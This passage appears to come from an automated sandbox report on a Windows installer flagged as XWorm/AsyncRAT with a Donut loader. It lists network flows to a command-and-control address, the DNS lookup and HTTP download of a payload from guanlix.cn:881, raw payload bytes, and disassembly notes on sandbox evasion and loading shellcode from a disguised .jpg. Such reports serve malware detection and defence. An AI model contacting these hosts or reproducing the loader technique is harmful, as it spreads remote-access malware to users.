Jul 2, 2024 19:24:49.402008057 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:24:49.482139111 CEST	49705	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:24:49.486979008 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:24:55.686440945 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:24:55.732991934 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:24:55.934787989 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:24:56.247065067 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:24:56.262841940 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:24:56.265700102 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:24:56.575150967 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:24:56.577826977 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:24:56.585431099 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:24:57.059932947 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:24:57.065505028 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:24:57.368624926 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:24:57.378398895 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:24:57.386564970 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:24:59.231894970 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:24:59.237128973 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:24:59.545216084 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:24:59.548425913 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:24:59.553273916 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:25:06.671715975 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:25:06.676554918 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:25:06.976421118 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:25:06.984164000 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:25:06.989989042 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:25:15.794219017 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:25:15.799235106 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:25:16.101568937 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:25:16.104199886 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:25:16.109139919 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:25:25.219240904 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:25:25.224345922 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:25:25.544198990 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:25:25.548010111 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:25:25.552923918 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:25:25.806200981 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:25:25.856448889 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:25:25.872324944 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:25:25.877239943 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:25:25.919280052 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:25:25.924202919 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:25:26.176769018 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:25:26.180346966 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:25:26.185255051 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:25:26.569180965 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:25:26.571595907 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:25:26.577605009 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:25:33.466676950 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:25:33.474189043 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:25:33.773597956 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:25:33.778112888 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:25:33.783231974 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:25:45.638134956 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:25:45.645811081 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:25:45.954492092 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:25:45.957077980 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:25:45.961869955 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:25:51.544325113 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:25:51.549175024 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:25:51.591152906 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:25:51.596000910 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:25:51.653727055 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:25:51.658766031 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:25:51.700510979 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:25:51.705828905 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:25:51.849095106 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:25:51.852026939 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:25:51.856828928 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:25:52.072693110 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:25:52.074965954 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:25:52.079807997 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:25:52.281801939 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:25:52.287911892 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:25:52.292777061 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:25:52.292996883 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:25:52.297838926 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:25:55.795675039 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:25:55.840972900 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:26:03.872601986 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:26:03.877731085 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:26:04.177892923 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:26:04.180175066 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:26:04.185101986 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:26:12.091423988 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:26:12.257863998 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:26:12.561835051 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:26:12.584357977 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:26:12.589391947 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:26:19.281224012 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:26:19.286127090 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:26:19.585946083 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:26:19.588553905 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:26:19.593446970 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:26:25.723293066 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:26:25.778419018 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:26:31.450617075 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:26:31.455497980 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:26:31.757742882 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:26:31.761218071 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:26:31.766170979 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:26:37.294320107 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:26:37.544898987 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:26:37.852529049 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:26:37.854463100 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:26:37.859286070 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:26:39.888070107 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:26:39.893516064 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:26:40.193869114 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:26:40.198266029 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:26:40.203286886 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:26:46.950707912 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:26:46.958439112 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:26:47.257855892 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:26:47.260148048 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:26:47.264983892 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:26:52.888179064 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:26:52.893136024 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:26:53.138137102 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:26:53.143094063 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:26:53.153784990 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:26:53.158818007 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:26:53.169388056 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:26:53.174367905 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:26:53.198040962 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:26:53.199999094 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:26:53.245881081 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:26:53.246129990 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:26:53.251065969 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:26:53.449711084 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:26:53.451581955 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:26:53.456538916 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:26:53.662235975 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:26:53.665180922 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:26:53.670011044 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:26:53.870879889 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:26:53.874535084 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:26:53.879309893 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:26:53.879472017 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:26:53.884313107 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:26:54.950783014 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:26:54.957231045 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:26:55.257076025 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:26:55.259150982 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:26:55.263972044 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:26:55.721303940 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:26:55.763154984 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:26:58.903836012 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:26:58.911067009 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:26:58.919271946 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:26:58.924236059 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:26:59.211589098 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:26:59.213247061 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:26:59.220258951 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:26:59.433629990 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:26:59.435163021 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:26:59.440088987 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:27:02.934998035 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:27:03.247226954 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:27:03.856565952 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:27:03.958843946 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:27:03.958863020 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:27:03.958960056 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:27:04.262190104 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:27:04.309705019 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:27:04.366267920 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:27:04.374025106 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:27:04.376338959 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:27:04.399761915 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:27:04.946686029 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:27:04.947576046 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:27:04.952653885 CEST	7000	49706	156.238.235.31	192.168.2.8

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 2, 2024 19:22:59.512325048 CEST	52766	53	192.168.2.8	1.1.1.1
Jul 2, 2024 19:22:59.984931946 CEST	53	52766	1.1.1.1	192.168.2.8
Jul 2, 2024 19:23:32.551651001 CEST	53	50743	162.159.36.2	192.168.2.8
Jul 2, 2024 19:23:33.060867071 CEST	50684	53	192.168.2.8	1.1.1.1
Jul 2, 2024 19:23:33.074786901 CEST	53	50684	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 2, 2024 19:22:59.512325048 CEST	192.168.2.8	1.1.1.1	0x96ae	Standard query (0)	guanlix.cn	A (IP address)	IN (0x0001)	false
Jul 2, 2024 19:23:33.060867071 CEST	192.168.2.8	1.1.1.1	0xaeb1	Standard query (0)	56.126.166.20.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 2, 2024 19:22:59.984931946 CEST	1.1.1.1	192.168.2.8	0x96ae	No error (0)	guanlix.cn		91.208.240.157	A (IP address)	IN (0x0001)	false
Jul 2, 2024 19:23:33.074786901 CEST	1.1.1.1	192.168.2.8	0xaeb1	Name error (3)	56.126.166.20.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false

HTTP Request Dependency Graph

guanlix.cn:881

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49705	91.208.240.157	881	7148	C:\Users\user\Desktop\31__Installer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 19:22:59.996233940 CEST	93	OUT	GET /31.ccp HTTP/1.1 User-Agent: Download Host: guanlix.cn:881 Cache-Control: no-cache
Jul 2, 2024 19:23:00.946445942 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Tue, 02 Jul 2024 17:22:44 GMT Content-Type: application/octet-stream Content-Length: 71938 Last-Modified: Mon, 01 Jul 2024 01:27:00 GMT Connection: keep-alive ETag: "668205e4-11902" Accept-Ranges: bytes Data Raw: e8 88 bb 00 00 88 bb 00 00 9e 17 7a 0f 05 b6 fa 05 be ae 6c 11 f9 d0 84 84 17 2c d2 af e5 2f 7a 81 4e 8c d6 d5 78 43 0d 21 00 00 00 00 78 5c f5 47 36 fd 4b c5 c7 38 4c f2 a6 53 12 44 94 2a 71 83 2d f1 72 bd 7a 64 fc f8 d2 d9 2e f6 36 a1 db 22 09 67 88 11 60 ea 2a 2d 53 20 7d 08 87 ef 85 6d 13 9c 56 1f 71 ef 25 87 22 28 c2 75 41 87 ee 5c 0b 3b cf 17 f8 f3 d6 20 fb 7a 13 14 9d 2d 7e 38 99 31 8d 02 08 07 51 6e e7 07 db 6b 6f 27 05 76 c7 b8 f1 54 fd fa 96 e2 47 cc 6e 86 02 63 ab 0c 48 57 16 4a ce 0d 48 3f c1 9e 74 45 12 59 0e ed 7c 9c b0 c9 4f 88 52 08 9a e5 24 38 84 43 aa 56 80 39 82 17 71 99 a3 44 56 d0 70 0c 59 ac 5b 58 af 93 b3 fe e9 a1 42 a6 de 75 f2 7a be d9 29 8f 85 06 91 7e 3b e4 8e 08 f7 d5 e9 94 44 30 de 00 52 e6 ae aa 0f 0d 96 ea 40 a9 da 44 74 9d c3 28 51 01 8e 32 2c b7 7b 47 26 ac c2 c6 c4 10 b6 38 4c 4b 79 06 f6 68 70 c7 ec bd 92 f0 22 ba 46 6e 5c b3 91 78 e2 60 9d e5 10 a2 14 1a cb e5 e1 92 f5 62 04 bc b2 36 2a 9f 3d 79 99 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: zl,/zNxC!x\G6K8LSDq-rzd.6"g`-S }mVq%"(uA\; z-~81Qnko'vTGncHWJH?tEY\|OR$8CV9qDVpY[XBuz)~;D0R@Dt(Q2,{G&8LKyhp"Fn\x`b6=yB]t<bfcGlK/a;{q0RC.K\8e1.[&/$_6Y9Msc55G{#'&O8e@)meJa3kQ\KAxVp7ST$f4wzde8[COI2+3]MOEu 4MIm_'F{:^N*AgCG-;fRo,v:-DdadeN{5(4[TXE-E?KVTOFv9i&O pMl2lJdi5^J_YO\ACSB

Target ID:	0
Start time:	13:22:57
Start date:	02/07/2024
Path:	C:\Users\user\Desktop\31__Installer.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\31__Installer.exe"
Imagebase:	0x3e0000
File size:	249'344 bytes
MD5 hash:	CC1BB6A11AA1706BCBC42F04D1B1D865
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.3819296755.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3820992471.0000000005450000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.3820992471.0000000005450000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3819907463.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	11.5%
Dynamic/Decrypted Code Coverage:	11.3%
Signature Coverage:	2%
Total number of Nodes:	799
Total number of Limit Nodes:	80

Executed Functions

Function 003E25AD Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 003E25AD

Part of subcall function 003E2202: __EH_prolog.LIBCMT ref: 003E2207

Memory Dump Source

Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 695f51a2aa6ddaef3956efc8162eae0191451e51324e6635d531043379de720e
Instruction ID: 1d236603f44a09471aad1f111d3d4ef84b595de0dd78e2a1466ac36ccc99eb1a
Opcode Fuzzy Hash: 695f51a2aa6ddaef3956efc8162eae0191451e51324e6635d531043379de720e
Instruction Fuzzy Hash: 75113D75900269DFCF12DF99C981AAEBBB8FF18314F20825AE552672A1C7759F00DF90

Function 05464D08 Relevance: 1.5, Strings: 1, Instructions: 281COMMON

Download Yara Rule

Strings

\VJm, xrefs: 05464FBF

Memory Dump Source

Source File: 00000000.00000002.3821009718.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5460000_31__Installer.jbxd

Similarity

API ID:
String ID: \VJm
API String ID: 0-4047210350
Opcode ID: 100c60d5016897ccb8402a998b061fa5926b077ed08ae4675096790860f8ba7d
Instruction ID: 066c6941ed05a609f212038dc9b4792b01fa69b77436b2682e086d52d350a870
Opcode Fuzzy Hash: 100c60d5016897ccb8402a998b061fa5926b077ed08ae4675096790860f8ba7d
Instruction Fuzzy Hash: 36B13E70E042098FDF14CFA9C985BEEBBF2BF88714F14812AD415A7394EB759845CB82

Function 0546ED84 Relevance: .9, Instructions: 935COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3821009718.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5460000_31__Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af531306ec52a83faad8fe8e491c3ae5bbcd54fc439aec5e37e9ecae3efe2ca3
Instruction ID: 74b215cd7a4aa4c981ce181af88dee26fbe45b11ce322fcba493ba19c9675d4a
Opcode Fuzzy Hash: af531306ec52a83faad8fe8e491c3ae5bbcd54fc439aec5e37e9ecae3efe2ca3
Instruction Fuzzy Hash: C25283347003019BDB08EBB6D964FAE77A7FF84700F50415AD4469B399EF359C468B82

Function 0546A6B8 Relevance: .9, Instructions: 896COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3821009718.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5460000_31__Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 522102227a06c9bb29b1563522a73a0297f0a2e1430daf848a48f58e198d2ad0
Instruction ID: c11285f4072cb92a4e79b40425da3f0a97896582cb722657e163ec676c0eed83
Opcode Fuzzy Hash: 522102227a06c9bb29b1563522a73a0297f0a2e1430daf848a48f58e198d2ad0
Instruction Fuzzy Hash: 81722970A00619DFDB14DFA9C984BAEBBB6FF88340F1481AAE506EB351DB34D941CB51

Function 0546B408 Relevance: .9, Instructions: 884COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3821009718.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5460000_31__Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aadb66daa41557852879fb17055975b48864d628e6d6a9a17d9968dec593a71a
Instruction ID: 84692772135cd4316bacd4ac2b321d5b2bfc5291f96957e19eff3e428a4dd0ac
Opcode Fuzzy Hash: aadb66daa41557852879fb17055975b48864d628e6d6a9a17d9968dec593a71a
Instruction Fuzzy Hash: 25820631A046099FCB14CF69D984BEABBF2FF88314F15859AE406DB365DB30E941CB52

Function 054655D8 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3821009718.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5460000_31__Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4ceb48b05b62bdd1a8e70ae1c2352ccb2a93024944e942e1997fa2b4383ff46
Instruction ID: 41bf1414eb1e87762c2108b4aff08e639bbe028525a6eac2fc30b79f56554548
Opcode Fuzzy Hash: b4ceb48b05b62bdd1a8e70ae1c2352ccb2a93024944e942e1997fa2b4383ff46
Instruction Fuzzy Hash: 4AB13C70E04209CFDB14CFA9C8857EEBBF2BF88714F54852AD815A7394EB749845CB82

Function 003E11E1 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 89
filesleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount64.KERNEL32 ref: 003E11EF
Sleep.KERNEL32(0000012C), ref: 003E11F9
GetTickCount64.KERNEL32 ref: 003E11FF

Part of subcall function 003E4424: __vwprintf_l.LIBCMT ref: 003E4432

CreateFileA.KERNEL32(C:\Users\Public\Downloads\ind.jpg,80000000,00000001,00000000,00000004,00000080,00000000), ref: 003E1244
GetFileSize.KERNEL32(00000000,00000000), ref: 003E124E
VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040), ref: 003E125F
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 003E1270
CloseHandle.KERNEL32(00000000), ref: 003E1277

Strings

v4:%d, xrefs: 003E120C
`3Wu01Wu, xrefs: 003E124E
C:\Users\Public\Downloads\ind.jpg, xrefs: 003E123F
sandbox!!!, xrefs: 003E1222

Memory Dump Source

Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd

Similarity

API ID: File$Count64Tick$AllocCloseCreateHandleReadSizeSleepVirtual__vwprintf_l
String ID: C:\Users\Public\Downloads\ind.jpg$`3Wu01Wu$sandbox!!!$v4:%d
API String ID: 1694741105-1659962086
Opcode ID: 9129fa001ae7cb9a9e449da07c5b4552e20c13dcffa7c27bd578de3a5fde6620
Instruction ID: 8450c90eaefe9014b339f9e22102e425d695abe902eaa199d06a025ce3dea5cb
Opcode Fuzzy Hash: 9129fa001ae7cb9a9e449da07c5b4552e20c13dcffa7c27bd578de3a5fde6620
Instruction Fuzzy Hash: AD11B4736002187FE72257F66C49FBB7AACDF86770F110526FA05D21A0D9A45C00C6B5

Function 003E2E42 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 71
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 003E2E42
InternetOpenA.WININET(Download,00000001,00000000,00000000,00000000), ref: 003E2E5E
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 003E2E7B
InternetCloseHandle.WININET(?), ref: 003E2F0F

Part of subcall function 003E2D13: __EH_prolog.LIBCMT ref: 003E2D18

InternetReadFile.WININET(?,?,00001000,?), ref: 003E2EE1
